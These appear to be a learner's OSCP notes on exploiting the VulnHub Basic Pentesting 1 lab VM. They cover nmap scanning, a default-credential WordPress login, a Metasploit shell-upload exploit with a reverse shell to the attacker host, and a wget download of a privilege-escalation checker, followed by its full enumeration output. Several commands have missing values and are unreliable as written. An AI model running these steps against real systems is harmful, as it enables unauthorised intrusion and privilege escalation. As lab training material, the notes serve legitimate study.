OSCP Learning Notes - Privilege Escalation

时间:2023-03-09 22:47:17
OSCP Learning Notes - Privilege Escalation

Privilege Escalation

Download the Basic-pentesting vitualmation from the following website:

https://www.vulnhub.com/entry/basic-pentesting-1,216/

1.Scan the target server using nmap.

nmap -Pn -sS --stats-every 3m --max-scan-delay  --defeat-rst-ratelimit -T4 -p1- -oN /root/privesc/tcp.txt.txt 10.0.0.24

OSCP Learning Notes - Privilege Escalation

nmap -nvv -Pn- -sSV -p ,, --version-intensity  -A -oN /root/privesc/tcp1.txt.txt 192.168.134.147

OSCP Learning Notes - Privilege Escalation

OSCP Learning Notes - Privilege Escalation

nmap -Pn --top-ports  -sU --stats-every 3m --max-retries  -T3 -oN /root/privesc/udp.txt.txt 10.0.0.24

OSCP Learning Notes - Privilege Escalation

2.Browse the target server through Firefox.

OSCP Learning Notes - Privilege Escalation

3. Perform the vulneribility scan using the tool nikto or dirbuster.

OSCP Learning Notes - Privilege Escalation

4.Echo the following commands and browser the "http://10.0.0.24/secret" again.

echo "10.0.0.24 vtcsec" >> /etc/hosts

OSCP Learning Notes - Privilege Escalation

OSCP Learning Notes - Privilege Escalation

5. Try to login the wordpress(Use the default username and password - admin/admin )

OSCP Learning Notes - Privilege Escalation

OSCP Learning Notes - Privilege Escalation

6.Exploit the target server using metasploit.

Start the metasploit firstly.

msfconsole

OSCP Learning Notes - Privilege Escalation

Choose the proper module and set the options.

use exploit/unix/webapp/wp_admin_shell_upload

OSCP Learning Notes - Privilege Escalation

set username admin
set password admin
set targeturi /secret/
set lhost 10.0.0.109
set rhost 10.0.0.24
exploit

OSCP Learning Notes - Privilege Escalation

getuid

shell

OSCP Learning Notes - Privilege Escalation

7. Download the linuxprivchecker.py from the following the website and copy it the the folder /var/www/html on Kali Linux.

https://github.com/sleventyeleven/linuxprivchecker/blob/master/linuxprivchecker.py

OSCP Learning Notes - Privilege Escalation

Download the linuxprivchecker.py to target serve and grant the full privilages.

wget 10.0.0.109/linuxprivchecker.py 

chmod  linuxprivchecker.py

ls -la

OSCP Learning Notes - Privilege Escalation

Check the target linux server's privilege by echo the following command.

python linuxprivchecker.py

The check result:

=================================================================================================
LINUX PRIVILEGE ESCALATION CHECKER
================================================================================================= [*] GETTING BASIC SYSTEM INFO... [+] Kernel
Linux version 4.10.0-28-generic (buildd@lgw01-12) (gcc version 5.4.0 20160609 (Ubuntu 5.4.0-6ubuntu1~16.04.4) ) #32~16.04.2-Ubuntu SMP Thu Jul 20 10:19:48 UTC 2017 [+] Hostname
vtcsec [+] Operating System
Ubuntu 16.04.3 LTS \n \l [*] GETTING NETWORKING INFO... [+] Interfaces
ens33 Link encap:Ethernet HWaddr 00:0c:29:41:76:7f
inet addr:10.0.0.24 Bcast:10.0.0.255 Mask:255.255.255.0
inet6 addr: 240e:3a1:5662:9050::1007/128 Scope:Global
inet6 addr: fe80::6bc9:e854:ec85:9c1b/64 Scope:Link
UP BROADCAST RUNNING MULTICAST MTU:1500 Metric:1
RX packets:126922 errors:0 dropped:0 overruns:0 frame:0
TX packets:105713 errors:0 dropped:0 overruns:0 carrier:0
collisions:0 txqueuelen:1000
RX bytes:76154345 (76.1 MB) TX bytes:13344469 (13.3 MB)
lo Link encap:Local Loopback
inet addr:127.0.0.1 Mask:255.0.0.0
inet6 addr: ::1/128 Scope:Host
UP LOOPBACK RUNNING MTU:65536 Metric:1
RX packets:2277 errors:0 dropped:0 overruns:0 frame:0
TX packets:2277 errors:0 dropped:0 overruns:0 carrier:0
collisions:0 txqueuelen:1000
RX bytes:163834 (163.8 KB) TX bytes:163834 (163.8 KB) [+] Netstat
Active Internet connections (servers and established)
Proto Recv-Q Send-Q Local Address Foreign Address State PID/Program name
tcp 0 0 127.0.1.1:53 0.0.0.0:* LISTEN -
tcp 0 0 0.0.0.0:21 0.0.0.0:* LISTEN -
tcp 0 0 0.0.0.0:22 0.0.0.0:* LISTEN -
tcp 0 0 127.0.0.1:631 0.0.0.0:* LISTEN -
tcp 0 0 127.0.0.1:3306 0.0.0.0:* LISTEN -
tcp 0 0 10.0.0.24:47502 10.0.0.109:4444 ESTABLISHED 2235/sh
tcp6 0 0 :::22 :::* LISTEN -
tcp6 0 0 ::1:631 :::* LISTEN -
tcp6 0 0 :::80 :::* LISTEN -
tcp6 1 0 10.0.0.24:80 10.0.0.109:37597 CLOSE_WAIT -
udp 0 0 0.0.0.0:36239 0.0.0.0:* -
udp 0 0 0.0.0.0:56941 0.0.0.0:* -
udp 0 0 127.0.1.1:53 0.0.0.0:* -
udp 0 0 0.0.0.0:68 0.0.0.0:* -
udp 0 0 0.0.0.0:631 0.0.0.0:* -
udp 0 0 0.0.0.0:5353 0.0.0.0:* -
udp6 0 0 :::35041 :::* -
udp6 0 0 :::45337 :::* -
udp6 0 0 fe80::6bc9:e854:ec8:546 :::* -
udp6 0 0 :::5353 :::* - [+] Route
Kernel IP routing table
Destination Gateway Genmask Flags Metric Ref Use Iface
default 10.0.0.1 0.0.0.0 UG 100 0 0 ens33
10.0.0.0 * 255.255.255.0 U 100 0 0 ens33
link-local * 255.255.0.0 U 1000 0 0 ens33 [*] GETTING FILESYSTEM INFO... [+] Mount results
sysfs on /sys type sysfs (rw,nosuid,nodev,noexec,relatime)
proc on /proc type proc (rw,nosuid,nodev,noexec,relatime)
udev on /dev type devtmpfs (rw,nosuid,relatime,size=2000096k,nr_inodes=500024,mode=755)
devpts on /dev/pts type devpts (rw,nosuid,noexec,relatime,gid=5,mode=620,ptmxmode=000)
tmpfs on /run type tmpfs (rw,nosuid,noexec,relatime,size=404472k,mode=755)
/dev/sda1 on / type ext4 (rw,relatime,errors=remount-ro,data=ordered)
securityfs on /sys/kernel/security type securityfs (rw,nosuid,nodev,noexec,relatime)
tmpfs on /dev/shm type tmpfs (rw,nosuid,nodev)
tmpfs on /run/lock type tmpfs (rw,nosuid,nodev,noexec,relatime,size=5120k)
tmpfs on /sys/fs/cgroup type tmpfs (ro,nosuid,nodev,noexec,mode=755)
cgroup on /sys/fs/cgroup/systemd type cgroup (rw,nosuid,nodev,noexec,relatime,xattr,release_agent=/lib/systemd/systemd-cgroups-agent,name=systemd)
pstore on /sys/fs/pstore type pstore (rw,nosuid,nodev,noexec,relatime)
cgroup on /sys/fs/cgroup/cpu,cpuacct type cgroup (rw,nosuid,nodev,noexec,relatime,cpu,cpuacct)
cgroup on /sys/fs/cgroup/net_cls,net_prio type cgroup (rw,nosuid,nodev,noexec,relatime,net_cls,net_prio)
cgroup on /sys/fs/cgroup/blkio type cgroup (rw,nosuid,nodev,noexec,relatime,blkio)
cgroup on /sys/fs/cgroup/devices type cgroup (rw,nosuid,nodev,noexec,relatime,devices)
cgroup on /sys/fs/cgroup/hugetlb type cgroup (rw,nosuid,nodev,noexec,relatime,hugetlb)
cgroup on /sys/fs/cgroup/memory type cgroup (rw,nosuid,nodev,noexec,relatime,memory)
cgroup on /sys/fs/cgroup/cpuset type cgroup (rw,nosuid,nodev,noexec,relatime,cpuset)
cgroup on /sys/fs/cgroup/freezer type cgroup (rw,nosuid,nodev,noexec,relatime,freezer)
cgroup on /sys/fs/cgroup/pids type cgroup (rw,nosuid,nodev,noexec,relatime,pids)
cgroup on /sys/fs/cgroup/perf_event type cgroup (rw,nosuid,nodev,noexec,relatime,perf_event)
systemd-1 on /proc/sys/fs/binfmt_misc type autofs (rw,relatime,fd=29,pgrp=1,timeout=0,minproto=5,maxproto=5,direct,pipe_ino=1959)
hugetlbfs on /dev/hugepages type hugetlbfs (rw,relatime)
mqueue on /dev/mqueue type mqueue (rw,relatime)
debugfs on /sys/kernel/debug type debugfs (rw,relatime)
fusectl on /sys/fs/fuse/connections type fusectl (rw,relatime)
tmpfs on /run/user/108 type tmpfs (rw,nosuid,nodev,relatime,size=404472k,mode=700,uid=108,gid=114)
gvfsd-fuse on /run/user/108/gvfs type fuse.gvfsd-fuse (rw,nosuid,nodev,relatime,user_id=108,group_id=114) [+] fstab entries
# /etc/fstab: static file system information.
#
# Use 'blkid' to print the universally unique identifier for a
# device; this may be used with UUID= as a more robust way to name devices
# that works even if disks are added and removed. See fstab(5).
#
# <file system> <mount point> <type> <options> <dump> <pass>
# / was on /dev/sda1 during installation
UUID=c2265d85-3d4a-471f-b3d3-e1ab563d8520 / ext4 errors=remount-ro 0 1
# swap was on /dev/sda5 during installation
UUID=1c023225-b75c-4190-8876-f7e227f5dd4a none swap sw 0 0 [+] Scheduled cron jobs
-rw-r--r-- 1 root root 722 Apr 5 2016 /etc/crontab
/etc/cron.d:
total 32
drwxr-xr-x 2 root root 4096 Nov 16 2017 .
drwxr-xr-x 133 root root 12288 Nov 16 2017 ..
-rw-r--r-- 1 root root 102 Apr 5 2016 .placeholder
-rw-r--r-- 1 root root 244 Dec 28 2014 anacron
-rw-r--r-- 1 root root 670 Mar 1 2016 php
-rw-r--r-- 1 root root 190 Nov 14 2017 popularity-contest
/etc/cron.daily:
total 76
drwxr-xr-x 2 root root 4096 Nov 16 2017 .
drwxr-xr-x 133 root root 12288 Nov 16 2017 ..
-rw-r--r-- 1 root root 102 Apr 5 2016 .placeholder
-rwxr-xr-x 1 root root 311 Dec 28 2014 0anacron
-rwxr-xr-x 1 root root 539 Apr 5 2016 apache2
-rwxr-xr-x 1 root root 376 Mar 31 2016 apport
-rwxr-xr-x 1 root root 1474 Jun 19 2017 apt-compat
-rwxr-xr-x 1 root root 355 May 22 2012 bsdmainutils
-rwxr-xr-x 1 root root 384 Oct 5 2014 cracklib-runtime
-rwxr-xr-x 1 root root 1597 Nov 26 2015 dpkg
-rwxr-xr-x 1 root root 372 May 6 2015 logrotate
-rwxr-xr-x 1 root root 1293 Nov 6 2015 man-db
-rwxr-xr-x 1 root root 435 Nov 18 2014 mlocate
-rwxr-xr-x 1 root root 249 Nov 12 2015 passwd
-rwxr-xr-x 1 root root 3449 Feb 26 2016 popularity-contest
-rwxr-xr-x 1 root root 214 May 24 2016 update-notifier-common
-rwxr-xr-x 1 root root 1046 May 19 2016 upstart
/etc/cron.hourly:
total 20
drwxr-xr-x 2 root root 4096 Aug 1 2017 .
drwxr-xr-x 133 root root 12288 Nov 16 2017 ..
-rw-r--r-- 1 root root 102 Apr 5 2016 .placeholder
/etc/cron.monthly:
total 24
drwxr-xr-x 2 root root 4096 Aug 1 2017 .
drwxr-xr-x 133 root root 12288 Nov 16 2017 ..
-rw-r--r-- 1 root root 102 Apr 5 2016 .placeholder
-rwxr-xr-x 1 root root 313 Dec 28 2014 0anacron
/etc/cron.weekly:
total 36
drwxr-xr-x 2 root root 4096 Nov 14 2017 .
drwxr-xr-x 133 root root 12288 Nov 16 2017 ..
-rw-r--r-- 1 root root 102 Apr 5 2016 .placeholder
-rwxr-xr-x 1 root root 312 Dec 28 2014 0anacron
-rwxr-xr-x 1 root root 86 Apr 13 2016 fstrim
-rwxr-xr-x 1 root root 771 Nov 6 2015 man-db
-rwxr-xr-x 1 root root 211 May 24 2016 update-notifier-common [+] Writable cron dirs [*] ENUMERATING USER AND ENVIRONMENTAL INFO... [+] Logged in User Activity
00:35:06 up 1:37, 0 users, load average: 0.00, 0.00, 0.00
USER TTY FROM LOGIN@ IDLE JCPU PCPU WHAT [+] Super Users Found:
root [+] Environment
OLDPWD=/var/www/html/secret/wp-content/plugins
APACHE_RUN_DIR=/var/run/apache2
APACHE_PID_FILE=/var/run/apache2/apache2.pid
PATH=/usr/local/sbin:/usr/local/bin:/usr/sbin:/usr/bin:/sbin:/bin
APACHE_LOCK_DIR=/var/lock/apache2
LANG=C
APACHE_RUN_USER=www-data
APACHE_RUN_GROUP=www-data
APACHE_LOG_DIR=/var/log/apache2
PWD=/tmp [+] Root and current user history (depends on privs) [+] Sudoers (privileged) [+] All users
root:x:0:0:root:/root:/bin/bash
daemon:x:1:1:daemon:/usr/sbin:/usr/sbin/nologin
bin:x:2:2:bin:/bin:/usr/sbin/nologin
sys:x:3:3:sys:/dev:/usr/sbin/nologin
sync:x:4:65534:sync:/bin:/bin/sync
games:x:5:60:games:/usr/games:/usr/sbin/nologin
man:x:6:12:man:/var/cache/man:/usr/sbin/nologin
lp:x:7:7:lp:/var/spool/lpd:/usr/sbin/nologin
mail:x:8:8:mail:/var/mail:/usr/sbin/nologin
news:x:9:9:news:/var/spool/news:/usr/sbin/nologin
uucp:x:10:10:uucp:/var/spool/uucp:/usr/sbin/nologin
proxy:x:13:13:proxy:/bin:/usr/sbin/nologin
www-data:x:33:33:www-data:/var/www:/usr/sbin/nologin
backup:x:34:34:backup:/var/backups:/usr/sbin/nologin
list:x:38:38:Mailing List Manager:/var/list:/usr/sbin/nologin
irc:x:39:39:ircd:/var/run/ircd:/usr/sbin/nologin
gnats:x:41:41:Gnats Bug-Reporting System (admin):/var/lib/gnats:/usr/sbin/nologin
nobody:x:65534:65534:nobody:/nonexistent:/usr/sbin/nologin
systemd-timesync:x:100:102:systemd Time Synchronization,,,:/run/systemd:/bin/false
systemd-network:x:101:103:systemd Network Management,,,:/run/systemd/netif:/bin/false
systemd-resolve:x:102:104:systemd Resolver,,,:/run/systemd/resolve:/bin/false
systemd-bus-proxy:x:103:105:systemd Bus Proxy,,,:/run/systemd:/bin/false
syslog:x:104:108::/home/syslog:/bin/false
_apt:x:105:65534::/nonexistent:/bin/false
messagebus:x:106:110::/var/run/dbus:/bin/false
uuidd:x:107:111::/run/uuidd:/bin/false
lightdm:x:108:114:Light Display Manager:/var/lib/lightdm:/bin/false
whoopsie:x:109:117::/nonexistent:/bin/false
avahi-autoipd:x:110:119:Avahi autoip daemon,,,:/var/lib/avahi-autoipd:/bin/false
avahi:x:111:120:Avahi mDNS daemon,,,:/var/run/avahi-daemon:/bin/false
dnsmasq:x:112:65534:dnsmasq,,,:/var/lib/misc:/bin/false
colord:x:113:123:colord colour management daemon,,,:/var/lib/colord:/bin/false
speech-dispatcher:x:114:29:Speech Dispatcher,,,:/var/run/speech-dispatcher:/bin/false
hplip:x:115:7:HPLIP system user,,,:/var/run/hplip:/bin/false
kernoops:x:116:65534:Kernel Oops Tracking Daemon,,,:/:/bin/false
pulse:x:117:124:PulseAudio daemon,,,:/var/run/pulse:/bin/false
rtkit:x:118:126:RealtimeKit,,,:/proc:/bin/false
saned:x:119:127::/var/lib/saned:/bin/false
usbmux:x:120:46:usbmux daemon,,,:/var/lib/usbmux:/bin/false
marlinspike:x:1000:1000:marlinspike,,,:/home/marlinspike:/bin/bash
mysql:x:121:129:MySQL Server,,,:/nonexistent:/bin/false
sshd:x:122:65534::/var/run/sshd:/usr/sbin/nologin [+] Current User
www-data [+] Current User ID
uid=33(www-data) gid=33(www-data) groups=33(www-data) [*] ENUMERATING FILE AND DIRECTORY PERMISSIONS/CONTENTS... [+] World Writeable Directories for User/Group 'Root'
drwxrwxrwt 5 root root 100 Jul 29 2019 /run/lock
drwxrwxrwt 10 root root 4096 Jul 29 00:33 /tmp
drwxrwxrwt 2 root root 4096 Jul 29 2019 /tmp/.font-unix
drwxrwxrwt 2 root root 4096 Jul 29 2019 /tmp/.XIM-unix
drwxrwxrwt 2 root root 4096 Jul 29 2019 /tmp/.Test-unix
drwxrwxrwt 2 root root 4096 Jul 29 2019 /tmp/.ICE-unix
drwxrwxrwt 2 root root 4096 Jul 29 2019 /tmp/.X11-unix
drwxrwxrwt 2 root root 40 Jul 29 2019 /dev/mqueue
drwxrwxrwt 2 root root 140 Jul 29 2019 /dev/shm
drwxrwsrwt 2 root whoopsie 4096 Aug 1 2017 /var/metrics
drwxrwsrwt 2 root whoopsie 4096 Aug 1 2017 /var/crash
drwx-wx-wt 2 root root 4096 Apr 5 2016 /var/lib/php/sessions
drwxrwxrwt 5 root root 4096 Jul 29 2019 /var/tmp [+] World Writeable Directories for Users other than Root [+] World Writable Files
-rw-rw-rw- 1 root root 2364 Nov 16 2017 /etc/passwd
-rw-rw-rw- 1 root root 0 Jul 29 2019 /sys/kernel/security/apparmor/policy/.remove
-rw-rw-rw- 1 root root 0 Jul 29 2019 /sys/kernel/security/apparmor/policy/.replace
-rw-rw-rw- 1 root root 0 Jul 29 2019 /sys/kernel/security/apparmor/policy/.load
-rw-rw-rw- 1 root root 0 Jul 29 2019 /sys/kernel/security/apparmor/.remove
-rw-rw-rw- 1 root root 0 Jul 29 2019 /sys/kernel/security/apparmor/.replace
-rw-rw-rw- 1 root root 0 Jul 29 2019 /sys/kernel/security/apparmor/.load
-rw-rw-rw- 1 root root 0 Jul 29 2019 /sys/kernel/security/apparmor/.ns_name
-rw-rw-rw- 1 root root 0 Jul 29 2019 /sys/kernel/security/apparmor/.ns_level
-rw-rw-rw- 1 root root 0 Jul 29 2019 /sys/kernel/security/apparmor/.ns_stacked
-rw-rw-rw- 1 root root 0 Jul 29 2019 /sys/kernel/security/apparmor/.stacked
-rw-rw-rw- 1 root root 0 Jul 29 2019 /sys/kernel/security/apparmor/.access
--w--w--w- 1 root root 0 Jul 29 00:35 /sys/fs/cgroup/memory/cgroup.event_control
-rwxrwxrwx 1 www-data www-data 25304 Jul 29 00:25 /tmp/linuxprivchecker.py [+] Checking if root's home folder is accessible [+] SUID/SGID Files and Directories
drwxrwsr-x 4 root staff 4096 Aug 1 2017 /usr/local/lib/python2.7
drwxrwsr-x 2 root staff 4096 Aug 1 2017 /usr/local/lib/python2.7/site-packages
drwxrwsr-x 2 root staff 4096 Aug 1 2017 /usr/local/lib/python2.7/dist-packages
drwxrwsr-x 3 root staff 4096 Aug 1 2017 /usr/local/lib/python3.5
drwxrwsr-x 2 root staff 4096 Aug 1 2017 /usr/local/lib/python3.5/dist-packages
drwxrwsr-x 3 root staff 4096 Aug 1 2017 /usr/local/share/emacs
drwxrwsr-x 2 root staff 4096 Aug 1 2017 /usr/local/share/emacs/site-lisp
drwxrwsr-x 2 root staff 4096 Aug 1 2017 /usr/local/share/fonts
drwxrwsr-x 7 root staff 4096 Aug 1 2017 /usr/local/share/sgml
drwxrwsr-x 2 root staff 4096 Aug 1 2017 /usr/local/share/sgml/misc
drwxrwsr-x 2 root staff 4096 Aug 1 2017 /usr/local/share/sgml/declaration
drwxrwsr-x 2 root staff 4096 Aug 1 2017 /usr/local/share/sgml/entities
drwxrwsr-x 2 root staff 4096 Aug 1 2017 /usr/local/share/sgml/dtd
drwxrwsr-x 2 root staff 4096 Aug 1 2017 /usr/local/share/sgml/stylesheet
drwxrwsr-x 6 root staff 4096 Aug 1 2017 /usr/local/share/xml
drwxrwsr-x 2 root staff 4096 Aug 1 2017 /usr/local/share/xml/misc
drwxrwsr-x 2 root staff 4096 Aug 1 2017 /usr/local/share/xml/declaration
drwxrwsr-x 2 root staff 4096 Aug 1 2017 /usr/local/share/xml/entities
drwxrwsr-x 2 root staff 4096 Aug 1 2017 /usr/local/share/xml/schema
-rwsr-xr-- 1 root messagebus 42992 Jan 12 2017 /usr/lib/dbus-1.0/dbus-daemon-launch-helper
-rwsr-xr-x 1 root root 10232 Mar 27 2017 /usr/lib/eject/dmcrypt-get-device
-rwsr-xr-x 1 root root 14864 Jan 17 2016 /usr/lib/policykit-1/polkit-agent-helper-1
-rwsr-sr-x 1 root root 10584 Oct 13 2017 /usr/lib/xorg/Xorg.wrap
-rwxr-sr-x 1 root mail 14336 Feb 23 2016 /usr/lib/evolution/camel-lock-helper-1.2
-rwsr-xr-x 1 root root 85800 Oct 18 2017 /usr/lib/snapd/snap-confine
-rwsr-xr-x 1 root root 18664 Mar 18 2017 /usr/lib/x86_64-linux-gnu/oxide-qt/chrome-sandbox
-rwxr-sr-x 1 root utmp 10232 Mar 11 2016 /usr/lib/x86_64-linux-gnu/utempter/utempter
-rwsr-xr-x 1 root root 428240 Mar 16 2017 /usr/lib/openssh/ssh-keysign
-rwsr-xr-x 1 root root 54256 May 16 2017 /usr/bin/passwd
-rwsr-xr-x 1 root root 23376 Jan 17 2016 /usr/bin/pkexec
-rwsr-xr-x 1 root root 39904 May 16 2017 /usr/bin/newgrp
-rwxr-sr-x 1 root ssh 358624 Mar 16 2017 /usr/bin/ssh-agent
-rwxr-sr-x 1 root mlocate 39520 Nov 18 2014 /usr/bin/mlocate
-rwxr-sr-x 1 root tty 14752 Mar 1 2016 /usr/bin/bsd-write
-rwsr-xr-x 1 root root 40432 May 16 2017 /usr/bin/chsh
-rwxr-sr-x 1 root tty 27368 Jun 14 2017 /usr/bin/wall
-rwsr-xr-x 1 root root 136808 Jul 4 2017 /usr/bin/sudo
-rwxr-sr-x 1 root shadow 22768 May 16 2017 /usr/bin/expiry
-rwsr-xr-x 1 root root 49584 May 16 2017 /usr/bin/chfn
-rwxr-sr-x 1 root shadow 62336 May 16 2017 /usr/bin/chage
-rwxr-sr-x 1 root crontab 36080 Apr 5 2016 /usr/bin/crontab
-rwsr-xr-x 1 root root 75304 May 16 2017 /usr/bin/gpasswd
-rwsr-xr-- 1 root dip 390888 Jan 29 2016 /usr/sbin/pppd
drwxrwsr-t 2 root lpadmin 4096 Mar 25 2016 /usr/share/ppd/custom
drwxr-s--- 2 root dip 4096 Aug 1 2017 /etc/chatscripts
drwxr-s--- 2 root dip 4096 Aug 1 2017 /etc/ppp/peers
drwxr-sr-x 3 root systemd-journal 60 Jul 29 2019 /run/log/journal
drwxr-s---+ 2 root systemd-journal 60 Jul 29 2019 /run/log/journal/a478f04ad61746dbbeae5965dcb060f8
-rwsr-xr-x 1 root root 44680 May 7 2014 /bin/ping6
-rwsr-xr-x 1 root root 30800 Jul 12 2016 /bin/fusermount
-rwsr-xr-x 1 root root 27608 Jun 14 2017 /bin/umount
-rwsr-xr-x 1 root root 40128 May 16 2017 /bin/su
-rwsr-xr-x 1 root root 44168 May 7 2014 /bin/ping
-rwsr-xr-x 1 root root 40152 Jun 14 2017 /bin/mount
-rwsr-xr-x 1 root root 142032 Jan 28 2017 /bin/ntfs-3g
drwxrwsr-x 2 root staff 4096 Apr 12 2016 /var/local
drwxr-sr-x 86 man root 4096 Jul 29 2019 /var/cache/man
drwxr-sr-x 2 man root 4096 Jul 29 2019 /var/cache/man/ta
drwxr-sr-x 2 man root 4096 Jul 29 2019 /var/cache/man/ne
drwxr-sr-x 2 man root 4096 Jul 29 2019 /var/cache/man/ar
drwxr-sr-x 2 man root 4096 Jul 29 2019 /var/cache/man/it
drwxr-sr-x 2 man root 4096 Jul 29 2019 /var/cache/man/et
drwxr-sr-x 2 man root 4096 Jul 29 2019 /var/cache/man/sq
drwxr-sr-x 2 man root 4096 Jul 29 2019 /var/cache/man/my
drwxr-sr-x 2 man root 4096 Jul 29 2019 /var/cache/man/bo
drwxr-sr-x 2 man root 4096 Jul 29 2019 /var/cache/man/ps
drwxr-sr-x 2 man root 4096 Jul 29 2019 /var/cache/man/id
drwxr-sr-x 2 man root 4096 Jul 29 2019 /var/cache/man/fy
drwxr-sr-x 2 man root 4096 Jul 29 2019 /var/cache/man/bs
drwxr-sr-x 2 man root 4096 Jul 29 2019 /var/cache/man/mhr
drwxr-sr-x 2 man root 4096 Jul 29 2019 /var/cache/man/ru
drwxr-sr-x 2 man root 4096 Jul 29 2019 /var/cache/man/fi
drwxr-sr-x 2 man root 4096 Jul 29 2019 /var/cache/man/gd
drwxr-sr-x 2 man root 4096 Jul 29 2019 /var/cache/man/th
drwxr-sr-x 2 man root 4096 Jul 29 2019 /var/cache/man/hr
drwxr-sr-x 2 man root 4096 Jul 29 2019 /var/cache/man/ca
drwxr-sr-x 2 man root 4096 Jul 29 2019 /var/cache/man/fr_CA
drwxr-sr-x 2 man root 4096 Jul 29 2019 /var/cache/man/be
drwxr-sr-x 2 man root 4096 Jul 29 2019 /var/cache/man/pa
drwxr-sr-x 2 man root 4096 Jul 29 2019 /var/cache/man/sl
drwxr-sr-x 2 man root 4096 Jul 29 2019 /var/cache/man/pl
drwxr-sr-x 2 man root 4096 Jul 29 2019 /var/cache/man/shn
drwxr-sr-x 2 man root 4096 Jul 29 2019 /var/cache/man/zh_HK
drwxr-sr-x 2 man root 4096 Jul 29 2019 /var/cache/man/ja
drwxr-sr-x 2 man root 4096 Jul 29 2019 /var/cache/man/ast
drwxr-sr-x 2 man root 4096 Jul 29 2019 /var/cache/man/km
drwxr-sr-x 2 man root 4096 Jul 29 2019 /var/cache/man/nb
drwxr-sr-x 2 man root 4096 Jul 29 2019 /var/cache/man/fr.UTF-8
drwxr-sr-x 2 man root 4096 Jul 29 2019 /var/cache/man/hi
drwxr-sr-x 2 man root 4096 Jul 29 2019 /var/cache/man/ms
drwxr-sr-x 2 man root 4096 Jul 29 2019 /var/cache/man/da
drwxr-sr-x 2 man root 4096 Jul 29 2019 /var/cache/man/lv
drwxr-sr-x 2 man root 4096 Jul 29 2019 /var/cache/man/si
drwxr-sr-x 5 man root 4096 Jul 29 2019 /var/cache/man/oldlocal
drwxr-sr-x 2 man root 4096 Nov 17 2017 /var/cache/man/oldlocal/cat1
drwxr-sr-x 2 man root 4096 Nov 17 2017 /var/cache/man/oldlocal/cat5
drwxr-sr-x 2 man root 4096 Nov 17 2017 /var/cache/man/oldlocal/cat8
drwxr-sr-x 2 man root 4096 Jul 29 2019 /var/cache/man/zh_TW
drwxr-sr-x 2 man root 4096 Jul 29 2019 /var/cache/man/eu
drwxr-sr-x 2 man root 4096 Jul 29 2019 /var/cache/man/bg
drwxr-sr-x 2 man root 4096 Jul 29 2019 /var/cache/man/fo
drwxr-sr-x 2 man root 4096 Jul 29 2019 /var/cache/man/es
drwxr-sr-x 2 man root 4096 Jul 29 2019 /var/cache/man/eo
drwxr-sr-x 2 man root 4096 Jul 29 2019 /var/cache/man/fr
drwxr-sr-x 2 man root 4096 Jul 29 2019 /var/cache/man/ro
drwxr-sr-x 2 man root 4096 Jul 29 2019 /var/cache/man/uk
drwxr-sr-x 2 man root 4096 Jul 29 2019 /var/cache/man/ug
drwxr-sr-x 2 man root 4096 Jul 29 2019 /var/cache/man/de
drwxr-sr-x 2 man root 4096 Jul 29 2019 /var/cache/man/lt
drwxr-sr-x 2 man root 4096 Jul 29 2019 /var/cache/man/en_AU
drwxr-sr-x 2 man root 4096 Jul 29 2019 /var/cache/man/vi
drwxr-sr-x 2 man root 4096 Jul 29 2019 /var/cache/man/hu
drwxr-sr-x 2 man root 4096 Jul 29 2019 /var/cache/man/cy
drwxr-sr-x 2 man root 4096 Jul 29 2019 /var/cache/man/ce
drwxr-sr-x 2 man root 4096 Jul 29 2019 /var/cache/man/el
drwxr-sr-x 2 man root 4096 Jul 29 2019 /var/cache/man/uz
drwxr-sr-x 2 man root 4096 Jul 29 2019 /var/cache/man/cs
drwxr-sr-x 2 man root 4096 Jul 29 2019 /var/cache/man/oc
drwxr-sr-x 2 man root 4096 Jul 29 2019 /var/cache/man/sv
drwxr-sr-x 2 man root 4096 Jul 29 2019 /var/cache/man/nn
drwxr-sr-x 2 man root 4096 Jul 29 2019 /var/cache/man/fa
drwxr-sr-x 2 man root 4096 Jul 29 2019 /var/cache/man/ko
drwxr-sr-x 2 man root 4096 Jul 29 2019 /var/cache/man/hy
drwxr-sr-x 2 man root 4096 Jul 29 2019 /var/cache/man/he
drwxr-sr-x 2 man root 4096 Jul 29 2019 /var/cache/man/gl
drwxr-sr-x 2 man root 4096 Jul 29 2019 /var/cache/man/pt_BR
drwxr-sr-x 2 man root 4096 Jul 29 2019 /var/cache/man/ca@valencia
drwxr-sr-x 2 man root 4096 Jul 29 2019 /var/cache/man/en_CA
drwxr-sr-x 2 man root 4096 Jul 29 2019 /var/cache/man/sr
drwxr-sr-x 2 man root 4096 Jul 29 2019 /var/cache/man/zh_CN
drwxr-sr-x 2 man root 4096 Jul 29 2019 /var/cache/man/bn
drwxr-sr-x 2 man root 4096 Jul 29 2019 /var/cache/man/se
drwxr-sr-x 2 man root 4096 Jul 29 2019 /var/cache/man/pt
drwxr-sr-x 2 man root 4096 Jul 29 2019 /var/cache/man/fr.ISO8859-1
drwxr-sr-x 2 man root 4096 Jul 29 2019 /var/cache/man/sk
drwxr-sr-x 2 man root 4096 Jul 29 2019 /var/cache/man/ml
drwxr-sr-x 2 man root 4096 Jul 29 2019 /var/cache/man/tr
drwxr-sr-x 2 man root 4096 Jul 29 2019 /var/cache/man/az
drwxr-sr-x 2 man root 4096 Jul 29 2019 /var/cache/man/te
drwxr-sr-x 2 man root 4096 Jul 29 2019 /var/cache/man/en_GB
drwxr-sr-x 2 man root 4096 Jul 29 2019 /var/cache/man/ku
drwxr-sr-x 2 man root 4096 Jul 29 2019 /var/cache/man/kk
drwxr-sr-x 2 man root 4096 Jul 29 2019 /var/cache/man/io
drwxr-sr-x 2 man root 4096 Jul 29 2019 /var/cache/man/nl
drwxrwsrwt 2 root whoopsie 4096 Aug 1 2017 /var/metrics
drwxrwsr-x 2 root mail 4096 Aug 1 2017 /var/mail
drwxrwsrwt 2 root whoopsie 4096 Aug 1 2017 /var/crash
-rwxr-sr-x 1 root shadow 35600 Mar 16 2016 /sbin/unix_chkpwd
-rwxr-sr-x 1 root shadow 35632 Mar 16 2016 /sbin/pam_extrausers_chkpwd [+] Logs containing keyword 'password'
/var/log/bootstrap.log:Shadow passwords are now on. [+] Config files containing keyword 'password'
/etc/ssl/openssl.cnf:# input_password = secret
/etc/ssl/openssl.cnf:# output_password = secret
/etc/ssl/openssl.cnf:challengePassword = A challenge password
/etc/apache2/sites-available/default-ssl.conf: # Note that no password is obtained from the user. Every entry in the user
/etc/apache2/sites-available/default-ssl.conf: # file needs this password: `xxj31ZMTZzkVA'.
/etc/cracklib/cracklib.conf:# passwords should not match. The files may optionally be compressed
/etc/hdparm.conf:# --security-set-pass Set security password
/etc/hdparm.conf:# security_pass = password
/etc/hdparm.conf:# --user-master Select password to use
/etc/debconf.conf:# World-readable, and accepts everything but passwords.
/etc/debconf.conf:Reject-Type: password
